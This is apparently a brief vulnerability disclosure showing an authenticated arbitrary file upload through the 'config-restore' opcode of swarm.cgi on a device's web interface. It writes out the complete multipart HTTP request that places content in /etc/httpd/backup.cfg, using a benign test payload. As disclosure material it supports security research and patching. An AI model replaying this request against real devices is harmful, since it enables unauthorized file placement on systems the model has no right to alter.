An authenticated attacker can upload arbitrary content to /etc/httpd/backup.cfg, which can be later used as an endpoint to fetch files from.
After placing the arbitrary content an attacker can request it via http://IP:PORT/backup.cfg
POST /swarm.cgi HTTP/1.1
Host: IP:4343
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------267552147179520545798345899
Content-Length: 635
Origin: http://IP:4343
Connection: keep-alive
Referer: http:// IP:4343/
Upgrade-Insecure-Requests: 1
-----------------------------267552147179520545798345899
Content-Disposition: form-data; name="upload_id"
C0CCFB1C-2BAF-4CFE-85DF-A03A6FB65342
-----------------------------267552147179520545798345899
Content-Disposition: form-data; name="sid"
XXXXXXXXXXXXXXXXXXXX
-----------------------------267552147179520545798345899
Content-Disposition: form-data; name="opcode"
config-restore
-----------------------------267552147179520545798345899
Content-Disposition: form-data; name="config"; filename="file"
Content-Type: application/octet-stream
testtesttest
-----------------------------267552147179520545798345899--